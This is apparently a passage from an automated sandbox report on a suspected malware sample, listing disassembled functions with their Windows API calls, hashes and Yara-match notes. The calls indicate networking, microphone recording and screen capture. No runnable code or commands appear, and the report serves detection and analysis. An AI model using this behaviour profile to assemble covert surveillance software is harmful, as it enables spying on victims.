                        • CreateThread.KERNEL32(00000000,00000000,Function_00004D90,00000000,00000000,00000000), ref: 10005A3B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: a24aeb47e8e4f84affd8849fc90bbdf463ad89d9ac262a616eb167ff7a57c66e
                        • Instruction ID: b64d95053be4bdb7238b88687d28699a329b2960da88acc2f851128c795cdab7
                        • Opcode Fuzzy Hash: a24aeb47e8e4f84affd8849fc90bbdf463ad89d9ac262a616eb167ff7a57c66e
                        • Instruction Fuzzy Hash: 8B21E7727403556BF328DB349C85B1B77E2EBC4B61F25861DFA52AB2D0CAF4AC04C618
                        Function 10008A60 Relevance: 10.6, APIs: 7, Instructions: 86fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,1000803C,00000001), ref: 10008A94
                          • Part of subcall function 10008B40: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,1000803C,00000001), ref: 10008B64
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@CreateFile
                        • String ID:
                        • API String ID: 1804927778-0
                        • Opcode ID: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                        • Instruction ID: 2cbee5f73aa54b3bdbeea2601dca1461bf0f61acce64b1ebe15ca48bfbe30b26
                        • Opcode Fuzzy Hash: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                        • Instruction Fuzzy Hash: D621FF76300301ABF300DBA4DC89F5AB7AAEBC5761F10852AF745DA2C0D7B1A8058731
                        Function 1000F330 Relevance: 10.6, APIs: 7, Instructions: 66synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F36A
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F372
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F380
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F388
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F394
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F39A
                        • DestroyCursor.USER32(?), ref: 1000F3C4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                        • String ID:
                        • API String ID: 2236516186-0
                        • Opcode ID: 3ffa1f1c188cebbb19f655a76be77e1b952125273e2dd8129e9c19cd5186b017
                        • Instruction ID: a03e689654bc6474db5ec455c82bf0a822bd58bbdc9918214b3aa4310d428126
                        • Opcode Fuzzy Hash: 3ffa1f1c188cebbb19f655a76be77e1b952125273e2dd8129e9c19cd5186b017
                        • Instruction Fuzzy Hash: 02213B71200755ABD324EF59CC80B66B3A9FB89720F110B1EE56697790D7B5B9048B90
                        Function 1000D520 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,1006A076,000000FF), ref: 1000D555
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D563
                        • RtlDeleteCriticalSection.NTDLL(?), ref: 1000D59C
                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,1006A076,000000FF), ref: 1000D5A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                        • String ID: closesocket$ws2_32.dll
                        • API String ID: 1041861973-181964208
                        • Opcode ID: 68da6060db5162b1c40c0cf81342309e50d0ee96f82fe046d46d17e4307a4a01
                        • Instruction ID: 95d78208386eb911a1d3c0b03b10d253ff146846c36fede8dd456e9ff5a3265c
                        • Opcode Fuzzy Hash: 68da6060db5162b1c40c0cf81342309e50d0ee96f82fe046d46d17e4307a4a01
                        • Instruction Fuzzy Hash: 3011C271504B819FE340EF29CC44B5AB7E8FF45765F400B2EF965D3290DBB899048AA2
                        Function 10007DB0 Relevance: 10.6, APIs: 7, Instructions: 52stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000,?,00000000,10007770,00000000), ref: 10007DC1
                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,10007770,00000000), ref: 10007DCA
                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,10007770,00000000), ref: 10007DD1
                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,10007770,00000000), ref: 10007DD9
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,10007770,00000000), ref: 10007DEF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10007E02
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10007E09
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@ByteCharMultiWidelstrlen$??3@
                        • String ID:
                        • API String ID: 1676418047-0
                        • Opcode ID: 10c49fe91a4d5fdb5b5749182dffae639ca13a49863cddfe42f9b23efe61d36b
                        • Instruction ID: ee4b805df854161d3b647b4e454a37ef28bceacf17091f1f5db21fec8976eb02
                        • Opcode Fuzzy Hash: 10c49fe91a4d5fdb5b5749182dffae639ca13a49863cddfe42f9b23efe61d36b
                        • Instruction Fuzzy Hash: 84F02D7360126437F11065555C45F973A4DCB877F0F10023AF6149A1C1D4A47C1082B6
                        Function 10004040 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10003950: RtlEnterCriticalSection.NTDLL(100027B0), ref: 10003958
                          • Part of subcall function 10003950: RtlLeaveCriticalSection.NTDLL(100027B0), ref: 10003971
                        • _ftol.MSVCRT ref: 1000407F
                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004089
                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,1000175F,?,00000118,?,?,?,?,?,?), ref: 100040BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$??2@??3@EnterLeave_ftol
                        • String ID:
                        • API String ID: 2245774403-0
                        • Opcode ID: e54293974b624715fe12cb0dc13c47e8933b05d2789dbdde13171c2884a2995a
                        • Instruction ID: a0c423d738fcccbc95c9e89c39972746d0159de354ee6d97a2f82b004ae512e2
                        • Opcode Fuzzy Hash: e54293974b624715fe12cb0dc13c47e8933b05d2789dbdde13171c2884a2995a
                        • Instruction Fuzzy Hash: 2B41B4767043045BE705EE289C42A6F739DEBC4790F00492DF94597386EE75B90987A2
                        Function 0040510E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                        Download Yara Rule
                        APIs
                        • GetStringTypeW.KERNEL32(00000001,0040642C,00000001,00000000,00000103,00000001,00000000,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 0040514D
                        • GetStringTypeA.KERNEL32(00000000,00000001,00406428,00000001,?,?,00000000,00000000,00000001), ref: 00405167
                        • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 0040519B
                        • MultiByteToWideChar.KERNEL32(004043AC,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 004051D3
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405229
                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040523B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: StringType$ByteCharMultiWide
                        • String ID:
                        • API String ID: 3852931651-0
                        • Opcode ID: e16cf218f878321463a8e8b1036e6783c32adfa7d8257bd474d51601666a395d
                        • Instruction ID: 5652f6a01844cf5303c9984e54272d98c38225da9b9902f7ff6207b6633c277c
                        • Opcode Fuzzy Hash: e16cf218f878321463a8e8b1036e6783c32adfa7d8257bd474d51601666a395d
                        • Instruction Fuzzy Hash: EF415E72A40519AFCF209F94DC85EAF3BB9EF05750F10453AF911E6290D33989518FA8
                        Function 100103D0 Relevance: 9.1, APIs: 6, Instructions: 105windowCOMMON
                        Download Yara Rule
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(?,0000005C,00000000,00000000,00000060,00000000,1000FEDA,?,?,00000001), ref: 100103FB
                        • GetDC.USER32(00000000), ref: 10010456
                        • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10010463
                        • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10010476
                        • ReleaseDC.USER32(00000000,00000000), ref: 1001047F
                        • DeleteObject.GDI32(00000000), ref: 10010486
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@BitmapBitsCompatibleCreateDeleteObjectRelease
                        • String ID:
                        • API String ID: 1095915628-0
                        • Opcode ID: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                        • Instruction ID: e6d3d186e9f92d4220703d8de8e2d9e8fc21681ad3b0dafec7c560ae193a534e
                        • Opcode Fuzzy Hash: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                        • Instruction Fuzzy Hash: ED31D3716057418FE324CF29C8C4B5AFBE6FF85304F148A6DE1858B291E7B1A549CB50
                        Function 10005270 Relevance: 9.1, APIs: 6, Instructions: 86threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 10005278
                        • gethostbyname.WS2_32(?), ref: 10005284
                        • inet_ntoa.WS2_32(?), ref: 100052AE
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000531C
                        • CloseHandle.KERNEL32(00000000), ref: 1000531F
                        • CreateThread.KERNEL32(00000000,00000000,100051C0,00000000,00000000,00000000), ref: 1000534B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: 6d62a0336c79163c41a223aefc3a73d3514f119283b0facb72b3c528266f5256
                        • Instruction ID: ffebca66319c31e60d9bee6de3fe6fdfc6b1e340fb59ae2c9b05118a375df363
                        • Opcode Fuzzy Hash: 6d62a0336c79163c41a223aefc3a73d3514f119283b0facb72b3c528266f5256
                        • Instruction Fuzzy Hash: 4821F7327007105BE328DB389C85B2B77E2EBC4761F65461DFA12A73D0CAF4AC04C618
                        Function 100050D0 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 100050D8
                        • gethostbyname.WS2_32(?), ref: 100050E4
                        • inet_ntoa.WS2_32(?), ref: 1000510E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000517C
                        • CloseHandle.KERNEL32(00000000), ref: 1000517F
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F90,00000000,00000000,00000000), ref: 100051A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: 7b31bc57488c21b9448efa7a1f7c517d3a80befe94aa6e989514a7f681d268ff
                        • Instruction ID: 64b3123e4827e47880a7ad7eb9077fc01f66ac603dc609927157346488c87272
                        • Opcode Fuzzy Hash: 7b31bc57488c21b9448efa7a1f7c517d3a80befe94aa6e989514a7f681d268ff
                        • Instruction Fuzzy Hash: B221F4326007105BE328DB389C85B6B77E2EBC4760F25861DFA56A73D0CAB49C04C618
                        Function 10004430 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 10004438
                        • gethostbyname.WS2_32(?), ref: 10004444
                        • inet_ntoa.WS2_32(?), ref: 1000446E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100044DC
                        • CloseHandle.KERNEL32(00000000), ref: 100044DF
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004340,00000000,00000000,00000000), ref: 10004508
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: 9b45f0c775ecc02f906161811c12da30fc05bdbc321bbad7917fb322ab4d6f45
                        • Instruction ID: 133105fd9ebe25cdcd8a61e8cda3186f3284ea384c7f25d90d8eb6f3962d311d
                        • Opcode Fuzzy Hash: 9b45f0c775ecc02f906161811c12da30fc05bdbc321bbad7917fb322ab4d6f45
                        • Instruction Fuzzy Hash: 9B21C4727407105BE328DB389C85B2B76E2EBC4760F65862DFA56A73D0CEB4EC048658
                        Function 10004E50 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(00000002), ref: 10004E58
                        • gethostbyname.WS2_32(00000002), ref: 10004E64
                        • inet_ntoa.WS2_32(?), ref: 10004E8E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 10004EFC
                        • CloseHandle.KERNEL32(00000000), ref: 10004EFF
                        • CreateThread.KERNEL32(00000000,00000000,10004D90,00000000,00000000,00000000), ref: 10004F28
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: a866d7493f76b98ae74ab5c581e095756d2892dbfad40d15de01bce8e6809222
                        • Instruction ID: ad2582a4ffcc604befb010a62af28e06a439adf0eb2a80410d096e25c1de9e61
                        • Opcode Fuzzy Hash: a866d7493f76b98ae74ab5c581e095756d2892dbfad40d15de01bce8e6809222
                        • Instruction Fuzzy Hash: 3321E2726007505BE328DB389C85B2B76E2FBC4760F668629FA52A72D0CAB49C048658
                        Function 10003115 Relevance: 9.1, APIs: 6, Instructions: 72threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,10003270,?,00000004,?), ref: 1000312E
                        • waveInOpen.WINMM(?,0000FFFF,?,00000000,00000000,00020000,?,00000004,?), ref: 10003150
                        • waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,?,00000004,?), ref: 1000318D
                        • waveInAddBuffer.WINMM(?,?,00000020,?,?,?,00000004,?), ref: 100031A6
                        • ResumeThread.KERNEL32(?,?,?,00000020,?,?,?,00000004,?), ref: 100031B0
                        • waveInStart.WINMM(00000000,?,?,00000020,?,?,?,00000004,?), ref: 100031B9
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Thread$BufferCreateHeaderOpenPrepareResumeStart
                        • String ID:
                        • API String ID: 1884298844-0
                        • Opcode ID: 9177b628c4b6b208b7eefd6788938319efd1fe7dbebfaa62c0514f18309c519f
                        • Instruction ID: c75628e9fec6ceadf22e6c1d5d7f93180dcfda44161ad2f40c2c2d0d32740965
                        • Opcode Fuzzy Hash: 9177b628c4b6b208b7eefd6788938319efd1fe7dbebfaa62c0514f18309c519f
                        • Instruction Fuzzy Hash: 5D2118B5240311AFE314CF68DC84F62BBA9FB8D710F208659F6459B685C771F855CBA0
                        Function 10002E40 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002E58
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002E61
                        • ??2@YAPAXI@Z.MSVCRT(000003E8), ref: 10002E88
                        • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8), ref: 10002E92
                        • ??2@YAPAXI@Z.MSVCRT(000003E8,00000020,000003E8), ref: 10002E9D
                        • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8,00000020,000003E8), ref: 10002EA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CreateEvent
                        • String ID:
                        • API String ID: 747899935-0
                        • Opcode ID: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                        • Instruction ID: 2b286f4346eb15344f540de0acd479cc32b4a22a8eccacb7838922c13c36a97c
                        • Opcode Fuzzy Hash: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                        • Instruction Fuzzy Hash: 86214CB0911B449FD324CF6AC984553FBF8FF89348750892EE1898BA51E3B6A845CB64
                        Function 004030BC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                        Download Yara Rule
                        APIs
                        • GetVersionExA.KERNEL32 ref: 004030DB
                        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403110
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403170
                        Strings
                        Memory Dump Source
